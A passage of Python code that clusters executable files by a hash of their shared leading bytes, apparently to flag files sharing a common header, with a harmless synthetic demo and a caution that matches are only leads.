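        path = os.path.join(directory, name)
        if not (name.lower().endswith(ext) and os.path.isfile(path)):
            continue
        with open(path, "rb") as fh:
            head = fh.read(READ_LEN)
        if len(head) >= prefix_len:  # shorter files cannot match a full prefix
            groups[hashlib.sha256(head[:prefix_len]).digest()].append((name, head))
    clusters = []
    for members in groups.values():
        if len(members) < 2:
            continue
        first = members[0][1]
        shared = min(common_prefix_len(first, head) for _, head in members[1:])
        clusters.append(([n for n, _ in members], shared))
    return clusters

def build_demo_dir():
    """Constructed sample data: A.EXE and B.EXE share a 700-byte head, C.EXE does not."""
    d = tempfile.mkdtemp()
    stamp = (b"MZ" + bytes(range(256)) * 3)[:700]   # constructed stand-in image
    for i, name in enumerate(["A.EXE", "B.EXE", "C.EXE"]):
        body = b"MZ" + bytes([i + 1]) * 3000        # distinct contents per file
        if name != "C.EXE":
            body = stamp + body[len(stamp):]        # head replaced by the same bytes
        with open(os.path.join(d, name), "wb") as fh:
            fh.write(body)
    return d
```

Exact copies of one legitimate program also cluster, so a hit is a lead to
check against a known-good baseline rather than a verdict.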